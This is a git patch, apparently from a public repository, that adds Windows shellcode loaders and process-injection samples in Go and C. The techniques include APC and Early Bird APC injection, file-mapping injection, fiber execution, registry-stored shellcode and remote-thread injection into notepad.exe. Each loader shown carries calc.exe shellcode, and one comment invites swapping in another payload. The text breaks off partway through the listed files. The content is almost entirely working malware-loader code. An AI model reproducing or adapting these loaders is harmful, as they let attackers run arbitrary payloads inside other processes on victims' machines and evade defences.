From ff76c6db86f20b6513ad2b3ff75e9eb427b4e386 Mon Sep 17 00:00:00 2001 From: Codepulze <151552809+EvilBytecode@users.noreply.github.com> Date: Tue, 23 Jul 2024 14:09:23 +0100 Subject: [PATCH] Add files via upload --- APC_Injection/APC_Injection.go | 53 +++++++ .../Early_Bird_APC_Injection.go | 128 +++++++++++++++++ .../Local_Mapping_Injection.go | 74 ++++++++++ .../Local_Payload_Execution.go | 62 ++++++++ .../Payload_Execution_Fibers.go | 25 ++++ .../payload_exec_fibers.c | 23 +++ Payload_Placement/Payload_Placement.go | 26 ++++ Payload_Placement/Payload_Placement_Wrapper.c | 20 +++ Process_Injection_Shellcode/ProcInjMapper.c | 57 ++++++++ Process_Injection_Shellcode/ProcInjMapper.h | 9 ++ .../Process_Injection_Shellcode.go | 39 +++++ Process_Injection_Shellcode/build.bat | 3 + Registry_Shellcode/Reg_Wrapper.c | 81 +++++++++++ Registry_Shellcode/Registry_Shellcode.go | 29 ++++ Registry_Shellcode/build.bat | 4 + .../RemoteFuncMapper.c | 51 +++++++ .../RemoteFuncMapper.h | 18 +++ .../Remote_Function_Stomping_Injection.go | 50 +++++++ Remote_Function_Stomping_Injection/build.bat | 4 + Remote_Mapping_Injection/Remote_Mapper.c | 112 +++++++++++++++ .../Remote_Mapping_Injection.go | 33 +++++ .../Remote_Thread_Hijacking.go | 91 ++++++++++++ .../remote_thread_hijacking.c | 90 ++++++++++++ Threadless_Injection/Threadless_Injection.go | 68 +++++++++ Threadless_Injection/build.bat | 5 + .../threadless_injection_wrapper.c | 136 ++++++++++++++++++ .../threadless_injection_wrapper.def | 5 + .../threadless_injection_wrapper.h | 22 +++ 28 files changed, 1318 insertions(+) create mode 100644 APC_Injection/APC_Injection.go create mode 100644 Early_Bird_APC_Injection/Early_Bird_APC_Injection.go create mode 100644 Local_Mapping_Injection/Local_Mapping_Injection.go create mode 100644 Local_Payload_Execution/Local_Payload_Execution.go create mode 100644 Payload_Execution_Fibers/Payload_Execution_Fibers.go create mode 100644 Payload_Execution_Fibers/payload_exec_fibers.c create mode 100644 Payload_Placement/Payload_Placement.go create mode 100644 Payload_Placement/Payload_Placement_Wrapper.c create mode 100644 Process_Injection_Shellcode/ProcInjMapper.c create mode 100644 Process_Injection_Shellcode/ProcInjMapper.h create mode 100644 Process_Injection_Shellcode/Process_Injection_Shellcode.go create mode 100644 Process_Injection_Shellcode/build.bat create mode 100644 Registry_Shellcode/Reg_Wrapper.c create mode 100644 Registry_Shellcode/Registry_Shellcode.go create mode 100644 Registry_Shellcode/build.bat create mode 100644 Remote_Function_Stomping_Injection/RemoteFuncMapper.c create mode 100644 Remote_Function_Stomping_Injection/RemoteFuncMapper.h create mode 100644 Remote_Function_Stomping_Injection/Remote_Function_Stomping_Injection.go create mode 100644 Remote_Function_Stomping_Injection/build.bat create mode 100644 Remote_Mapping_Injection/Remote_Mapper.c create mode 100644 Remote_Mapping_Injection/Remote_Mapping_Injection.go create mode 100644 Remote_Thread_Hijacking/Remote_Thread_Hijacking.go create mode 100644 Remote_Thread_Hijacking/remote_thread_hijacking.c create mode 100644 Threadless_Injection/Threadless_Injection.go create mode 100644 Threadless_Injection/build.bat create mode 100644 Threadless_Injection/threadless_injection_wrapper.c create mode 100644 Threadless_Injection/threadless_injection_wrapper.def create mode 100644 Threadless_Injection/threadless_injection_wrapper.h diff --git a/APC_Injection/APC_Injection.go b/APC_Injection/APC_Injection.go new file mode 100644 index 0000000..d463f0d --- /dev/null +++ b/APC_Injection/APC_Injection.go @@ -0,0 +1,53 @@ +package main + +import ( + "fmt" + "syscall" + "unsafe" +) +const ( + // it can be like 0x2000 but itook this from uhh rubyredops cuz i was lazy to find it lol + MEM_COMMIT = 0x00001000 + MEM_RESERVE = 0x00002000 +) +// start calc.exe (Will start calculator.exe), example shellcode, replace with yours +var shellcode = []byte{ + 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, + 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, + 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, + 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, + 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, + 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, + 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, +} + +func main() { + Kernel32 := syscall.NewLazyDLL("kernel32.dll") + VirtualAllocation := Kernel32.NewProc("VirtualAlloc") + VirtualProtect := Kernel32.NewProc("VirtualProtect") + CreateThread := Kernel32.NewProc("CreateThread") + WaitForSingleObject := Kernel32.NewProc("WaitForSingleObject") + + addr, _, err := VirtualAllocation.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, syscall.PAGE_READWRITE) + if addr == 0 { + fmt.Printf("[!] VirtualAlloc Failed With Error: %v\n", err) + return + } + //copy is like memcpy btw or thats what i think cuz its similar cant lie :shrug: + copy((*[1 << 30]byte)(unsafe.Pointer(addr))[:], shellcode) + + var oldprotect uintptr + ret, _, err := VirtualProtect.Call(addr, uintptr(len(shellcode)), syscall.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldprotect))) + if ret == 0 { + fmt.Printf("[!] VirtualProtect Failed With Error: %v\n", err) + return + } + + thread, _, err := CreateThread.Call(0, 0, addr, 0, 0, 0) + if thread == 0 { + fmt.Printf("[!] CreateThread Failed With Error: %v\n", err) + return + } + + WaitForSingleObject.Call(thread, syscall.INFINITE) +} diff --git a/Early_Bird_APC_Injection/Early_Bird_APC_Injection.go b/Early_Bird_APC_Injection/Early_Bird_APC_Injection.go new file mode 100644 index 0000000..231611f --- /dev/null +++ b/Early_Bird_APC_Injection/Early_Bird_APC_Injection.go @@ -0,0 +1,128 @@ +package main + +import ( + "fmt" + "syscall" + "unsafe" +) + +var ( + kernel32 = syscall.NewLazyDLL("kernel32.dll") + ntdll = syscall.NewLazyDLL("ntdll.dll") + VirtualAllocEx = kernel32.NewProc("VirtualAllocEx") + VirtualProtectEx = kernel32.NewProc("VirtualProtectEx") + WriteProcessMemory = kernel32.NewProc("WriteProcessMemory") + CreateProcessA = kernel32.NewProc("CreateProcessA") + CreateRemoteThread = kernel32.NewProc("CreateRemoteThread") + QueueUserAPC = kernel32.NewProc("QueueUserAPC") + DebugActiveProcessStop = kernel32.NewProc("DebugActiveProcessStop") + CloseHandle = kernel32.NewProc("CloseHandle") + SleepEx = kernel32.NewProc("SleepEx") + + Startinf syscall.StartupInfo + ProcInfo syscall.ProcessInformation +) + +const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_READWRITE = 0x04 + PAGE_EXECUTE_READWRITE = 0x40 + DEBUG_PROCESS = 0x00000001 + INFINITE = 0xFFFFFFFF +) + +// Shellcode to start calc.exe +var ShellCode = []byte{ + 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, + 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, + 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, + 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, + 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, + 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, + 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, +} + +func main() { + /* + inject malicious code into legitimate processes. inserting malicious code into a process in its early stages + */ + cl := "C:\\Windows\\System32\\calc.exe" + + ret, _, err := CreateProcessA.Call( + 0, + uintptr(unsafe.Pointer(syscall.StringBytePtr(cl))), + 0, + 0, + 0, + DEBUG_PROCESS, + 0, + 0, + uintptr(unsafe.Pointer(&Startinf)), + uintptr(unsafe.Pointer(&ProcInfo)), + ) + if ret == 0 { + panic(fmt.Sprintf("CreateProcessA failed: %v", err)) + } + + hProcess := ProcInfo.Process + hThread := ProcInfo.Thread + + addr, _, err := VirtualAllocEx.Call( + uintptr(hProcess), + 0, + uintptr(len(ShellCode)), + MEM_COMMIT|MEM_RESERVE, + PAGE_READWRITE, + ) + if addr == 0 { + panic(fmt.Sprintf("VirtualAllocEx failed: %v", err)) + } + + _, _, err = WriteProcessMemory.Call( + uintptr(hProcess), + addr, + uintptr(unsafe.Pointer(&ShellCode[0])), + uintptr(len(ShellCode)), + 0, + ) + if ret == 0 { + panic(fmt.Sprintf("WriteProcessMemory failed: %v", err)) + } + + var ldprotect uint32 + ret, _, err = VirtualProtectEx.Call( + uintptr(hProcess), + addr, + uintptr(len(ShellCode)), + PAGE_EXECUTE_READWRITE, + uintptr(unsafe.Pointer(&ldprotect)), + ) + if ret == 0 { + panic(fmt.Sprintf("VirtualProtectEx failed: %v", err)) + } + + ret, _, err = QueueUserAPC.Call( + addr, + uintptr(hThread), + 0, + ) + if ret == 0 { + panic(fmt.Sprintf("QueueUserAPC failed: %v", err)) + } + + ret, _, err = DebugActiveProcessStop.Call(uintptr(ProcInfo.ProcessId)) + if ret == 0 { + panic(fmt.Sprintf("DebugActiveProcessStop failed: %v", err)) + } + + ret, _, err = CloseHandle.Call(uintptr(hProcess)) + if ret == 0 { + panic(fmt.Sprintf("CloseHandle (process) failed: %v", err)) + } + + ret, _, err = CloseHandle.Call(uintptr(hThread)) + if ret == 0 { + panic(fmt.Sprintf("CloseHandle (thread) failed: %v", err)) + } +} diff --git a/Local_Mapping_Injection/Local_Mapping_Injection.go b/Local_Mapping_Injection/Local_Mapping_Injection.go new file mode 100644 index 0000000..3f3800c --- /dev/null +++ b/Local_Mapping_Injection/Local_Mapping_Injection.go @@ -0,0 +1,74 @@ +package main + +import ( + "fmt" + "syscall" + "unsafe" +) + +var ( + kernel32 = syscall.NewLazyDLL("kernel32.dll") + CreateFileMappingW = kernel32.NewProc("CreateFileMappingW") + MapViewOfFile = kernel32.NewProc("MapViewOfFile") + CreateThread = kernel32.NewProc("CreateThread") + WaitForSingleObject = kernel32.NewProc("WaitForSingleObject") + CloseHandle = kernel32.NewProc("CloseHandle") +) + +func main() { + // start calc.exe + shellcode := []byte{ + 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, + 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, + 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, + 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, + 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, + 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, + 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, + } + + fmt.Println("[+] Creating a mapping file") + hfile, _, err := CreateFileMappingW.Call( + uintptr(0xFFFFFFFFFFFFFFFF), // INVALID_HANDLE_VALUE + 0, + syscall.PAGE_EXECUTE_READWRITE, + 0, + uintptr(len(shellcode)), + 0, + ) + if hfile == 0 { + panic(fmt.Sprintf("[!] CreateFileMappingW Failed With Error: %v", err)) + } + + fmt.Println("[+] Mapping the file object") + mapaddr, _, err := MapViewOfFile.Call( + hfile, + syscall.FILE_MAP_WRITE|syscall.FILE_MAP_EXECUTE, + 0, + 0, + uintptr(len(shellcode)), + ) + if mapaddr == 0 { + panic(fmt.Sprintf("[!] MapViewOfFile Failed With Error: %v", err)) + } + + fmt.Println("[+] Copying shellcode to mapped memory") + copy((*[276]byte)(unsafe.Pointer(mapaddr))[:], shellcode) + + fmt.Println("[+] Creating a thread") + hthread, _, err := CreateThread.Call( + 0, + 0, + mapaddr, + 0, + 0, + 0, + ) + if hthread == 0 { + panic(fmt.Sprintf("[!] CreateThread Failed With Error: %v", err)) + } + + fmt.Println("[+] Thread Executed!!") + WaitForSingleObject.Call(hthread, syscall.INFINITE) + CloseHandle.Call(hthread) +} diff --git a/Local_Payload_Execution/Local_Payload_Execution.go b/Local_Payload_Execution/Local_Payload_Execution.go new file mode 100644 index 0000000..f1809ea --- /dev/null +++ b/Local_Payload_Execution/Local_Payload_Execution.go @@ -0,0 +1,62 @@ +package main + +import ( + "fmt" + "unsafe" + "syscall" +) + +var ( + kernel32 = syscall.NewLazyDLL("kernel32.dll") + virtualalloc = kernel32.NewProc("VirtualAlloc") + virtualprotect = kernel32.NewProc("VirtualProtect") + createthread = kernel32.NewProc("CreateThread") + waitforsingleobject = kernel32.NewProc("WaitForSingleObject") +) + +const ( + memCommit = 0x00001000 + memReserve = 0x00002000 + pageReadWrite = 0x04 + pageExecuteReadWrite = 0x40 + infinite = 0xFFFFFFFF +) + +func main() { + shellcode := []byte{ + 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, + 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, + 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, + 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, + 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, + 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, + 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, + } + + fmt.Println("[+] Memory Allocation Being Performed") + addr, _, err := virtualalloc.Call(0, uintptr(len(shellcode)), memCommit|memReserve, pageReadWrite) + if addr == 0 { + panic(fmt.Sprintf("[!] VirtualAlloc failed: %v", err)) + } + + fmt.Println("[+] Copying Shellcode To Target Memory") + for i, v := range shellcode { + *(*byte)(unsafe.Pointer(addr + uintptr(i))) = v + } + + fmt.Println("[+] Changing Page Permissions") + var oldProtect uint32 + _, _, err = virtualprotect.Call(addr, uintptr(len(shellcode)), pageExecuteReadWrite, uintptr(unsafe.Pointer(&oldProtect))) + if err != nil && err.(syscall.Errno) != 0 { + panic(fmt.Sprintf("[!] VirtualProtect failed: %v", err)) + } + + fmt.Println("[+] Thread Being Created") + thread, _, err := createthread.Call(0, 0, addr, 0, 0, 0) + if thread == 0 { + panic(fmt.Sprintf("[!] CreateThread failed: %v", err)) + } + + fmt.Println("[+] Shellcode Executed!") + waitforsingleobject.Call(thread, infinite) +} diff --git a/Payload_Execution_Fibers/Payload_Execution_Fibers.go b/Payload_Execution_Fibers/Payload_Execution_Fibers.go new file mode 100644 index 0000000..ed1a437 --- /dev/null +++ b/Payload_Execution_Fibers/Payload_Execution_Fibers.go @@ -0,0 +1,25 @@ +package main + +/* +#include "payload_exec_fibers.c" +*/ +import "C" +import ( + "fmt" + "unsafe" +) +// Start Calc.exe +var shellcode = []byte{ + 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, + 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, + 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, + 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, + 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, + 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, + 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, +} + +func main() { + C.ExecSC((*C.uchar)(unsafe.Pointer(&shellcode[0])), C.size_t(len(shellcode))) + fmt.Println("[+] Shellcode Executed!") +} diff --git a/Payload_Execution_Fibers/payload_exec_fibers.c b/Payload_Execution_Fibers/payload_exec_fibers.c new file mode 100644 index 0000000..279964f --- /dev/null +++ b/Payload_Execution_Fibers/payload_exec_fibers.c @@ -0,0 +1,23 @@ +#include + +void ExecSC(const unsigned char* shellcode, size_t length) { + LPVOID allocmem = VirtualAlloc(NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (allocmem == NULL) { + ExitProcess(GetLastError()); + } + memcpy(allocmem, shellcode, length); + DWORD oldProtect; + if (!VirtualProtect(allocmem, length, PAGE_EXECUTE_READ, &oldProtect)) { + VirtualFree(allocmem, 0, MEM_RELEASE); + ExitProcess(GetLastError()); + } + HANDLE fiber = CreateFiber(0, (LPFIBER_START_ROUTINE)allocmem, NULL); + if (fiber == NULL) { + VirtualFree(allocmem, 0, MEM_RELEASE); + ExitProcess(GetLastError()); + } + ConvertThreadToFiber(NULL); + SwitchToFiber(fiber); + DeleteFiber(fiber); + VirtualFree(allocmem, 0, MEM_RELEASE); +} \ No newline at end of file diff --git a/Payload_Placement/Payload_Placement.go b/Payload_Placement/Payload_Placement.go new file mode 100644 index 0000000..528add6 --- /dev/null +++ b/Payload_Placement/Payload_Placement.go @@ -0,0 +1,26 @@ +package main + +/* +#include "Payload_Placement_Wrapper.c" +*/ +import "C" +import ( + "fmt" + "unsafe" +) + +// start calc.exe +var shellcode = []byte{ + 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, + 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, + 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, + 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, + 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, + 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, + 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, +} + +func main() { + C.ExecSC((*C.uchar)(unsafe.Pointer(&shellcode[0])), C.size_t(len(shellcode))) + fmt.Println("[+] Shellcode Executed!") +} diff --git a/Payload_Placement/Payload_Placement_Wrapper.c b/Payload_Placement/Payload_Placement_Wrapper.c new file mode 100644 index 0000000..05913c5 --- /dev/null +++ b/Payload_Placement/Payload_Placement_Wrapper.c @@ -0,0 +1,20 @@ +#include +#include + +typedef void (*shellcode_func)(); + +void ExecSC(const unsigned char* shellcode, size_t length) { + LPVOID allocmem = VirtualAlloc(NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (allocmem == NULL) { + ExitProcess(GetLastError()); + } + memcpy(allocmem, shellcode, length); + DWORD olprotec; + if (!VirtualProtect(allocmem, length, PAGE_EXECUTE_READ, &olprotec)) { + VirtualFree(allocmem, 0, MEM_RELEASE); + ExitProcess(GetLastError()); + } + shellcode_func func = (shellcode_func)allocmem; + func(); + VirtualFree(allocmem, 0, MEM_RELEASE); +} \ No newline at end of file diff --git a/Process_Injection_Shellcode/ProcInjMapper.c b/Process_Injection_Shellcode/ProcInjMapper.c new file mode 100644 index 0000000..90e5c85 --- /dev/null +++ b/Process_Injection_Shellcode/ProcInjMapper.c @@ -0,0 +1,57 @@ +#include "ProcInjMapper.h" +#include +#include + +DWORD find_process(const char *name) { + HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (hSnapshot == INVALID_HANDLE_VALUE) { + return 0; + } + + PROCESSENTRY32 pe; + pe.dwSize = sizeof(PROCESSENTRY32); + + if (!Process32First(hSnapshot, &pe)) { + CloseHandle(hSnapshot); + return 0; + } + + do { + if (strcmp(pe.szExeFile, name) == 0) { + CloseHandle(hSnapshot); + return pe.th32ProcessID; + } + } while (Process32Next(hSnapshot, &pe)); + + CloseHandle(hSnapshot); + return 0; +} + +BOOL inject_shellcode(DWORD pid, const unsigned char *buf, size_t len) { + HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); + if (hProcess == NULL) { + return FALSE; + } + + LPVOID addr = VirtualAllocEx(hProcess, NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ); + if (addr == NULL) { + CloseHandle(hProcess); + return FALSE; + } + + if (!WriteProcessMemory(hProcess, addr, buf, len, NULL)) { + CloseHandle(hProcess); + return FALSE; + } + + HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)addr, NULL, 0, NULL); + if (hThread == NULL) { + CloseHandle(hProcess); + return FALSE; + } + + WaitForSingleObject(hThread, INFINITE); + CloseHandle(hThread); + CloseHandle(hProcess); + return TRUE; +} diff --git a/Process_Injection_Shellcode/ProcInjMapper.h b/Process_Injection_Shellcode/ProcInjMapper.h new file mode 100644 index 0000000..1c4f92f --- /dev/null +++ b/Process_Injection_Shellcode/ProcInjMapper.h @@ -0,0 +1,9 @@ +#ifndef PROCINJMAPPER_H +#define PROCINJMAPPER_H + +#include + +DWORD find_process(const char *name); +BOOL inject_shellcode(DWORD pid, const unsigned char *buf, size_t len); + +#endif // PROCINJMAPPER_H diff --git a/Process_Injection_Shellcode/Process_Injection_Shellcode.go b/Process_Injection_Shellcode/Process_Injection_Shellcode.go new file mode 100644 index 0000000..542fc55 --- /dev/null +++ b/Process_Injection_Shellcode/Process_Injection_Shellcode.go @@ -0,0 +1,39 @@ +package main + +/* +#cgo LDFLAGS: -lpsapi +#include "ProcInjMapper.h" +*/ +import "C" +import ( + "fmt" + "unsafe" +) + +func main() { + shellcode := []byte{ + 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, + 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, + 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, + 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, + 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, + 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, + 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, + } + + procname := C.CString("notepad.exe") + defer C.free(unsafe.Pointer(procname)) + + pid := C.find_process(procname) + if pid == 0 { + fmt.Println("[!] Process not found") + return + } + + scess := C.inject_shellcode(pid, (*C.uchar)(&shellcode[0]), C.size_t(len(shellcode))) + if scess == C.FALSE { + fmt.Println("[!] Injection failed") + } else { + fmt.Println("[+] Injection successful") + } +} diff --git a/Process_Injection_Shellcode/build.bat b/Process_Injection_Shellcode/build.bat new file mode 100644 index 0000000..b7d6979 --- /dev/null +++ b/Process_Injection_Shellcode/build.bat @@ -0,0 +1,3 @@ +@echo off +go build -o ProcInj.exe +exit \ No newline at end of file diff --git a/Registry_Shellcode/Reg_Wrapper.c b/Registry_Shellcode/Reg_Wrapper.c new file mode 100644 index 0000000..1b8b2bf --- /dev/null +++ b/Registry_Shellcode/Reg_Wrapper.c @@ -0,0 +1,81 @@ +#include +#include +#include + +void writereg(BYTE *buf, DWORD size) { + HKEY hkey; + LONG status = RegOpenKeyExA( + HKEY_CURRENT_USER, + "Control Panel", + 0, + KEY_SET_VALUE, + &hkey + ); + if (status != ERROR_SUCCESS) { + printf("[!] RegOpenKeyExA Failed With Error: %ld\n", status); + return; + } + + status = RegSetValueExA( + hkey, + "Evilbytecode", + 0, + REG_BINARY, + buf, + size + ); + if (status != ERROR_SUCCESS) { + printf("[!] RegSetValueExA Failed With Error: %ld\n", status); + } else { + printf("[+] RegSetValueExA Succeeded\n"); + } + + RegCloseKey(hkey); +} + +void readreg() { + DWORD dataSize = 0; + DWORD type = REG_BINARY; + LONG status = RegGetValueA( + HKEY_CURRENT_USER, + "Control Panel", + "Evilbytecode", + RRF_RT_ANY, + &type, + NULL, + &dataSize + ); + if (status != ERROR_SUCCESS && status != ERROR_MORE_DATA) { + printf("[!] RegGetValueA Failed With Error: %ld\n", status); + return; + } + + BYTE *data = (BYTE*) malloc(dataSize); + if (!data) { + printf("[!] Memory allocation failed\n"); + return; + } + + status = RegGetValueA( + HKEY_CURRENT_USER, + "Control Panel", + "Evilbytecode", + RRF_RT_ANY, + &type, + data, + &dataSize + ); + if (status != ERROR_SUCCESS) { + printf("[!] RegGetValueA Failed With Error: %ld\n", status); + free(data); + return; + } + + printf("[+] RegGetValueA Succeeded: "); + for (DWORD i = 0; i < dataSize; i++) { + printf("%02x ", data[i]); + } + printf("\n"); + + free(data); +} diff --git a/Registry_Shellcode/Registry_Shellcode.go b/Registry_Shellcode/Registry_Shellcode.go new file mode 100644 index 0000000..bc46797 --- /dev/null +++ b/Registry_Shellcode/Registry_Shellcode.go @@ -0,0 +1,29 @@ +package main + +/* +#include + +void writereg(BYTE *buf, DWORD size); +void readreg(); +*/ +import "C" +import ( + "unsafe" +) + +func main() { + // start calc.exe (btw you need to customize this a bit lol) + buf := []byte{ + 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, + 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, + 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, + 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, + 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, + 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, + 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, + } + + C.writereg((*C.BYTE)(unsafe.Pointer(&buf[0])), C.DWORD(len(buf))) + C.readreg() + println("[+] Registry operations completed successfully") +} diff --git a/Registry_Shellcode/build.bat b/Registry_Shellcode/build.bat new file 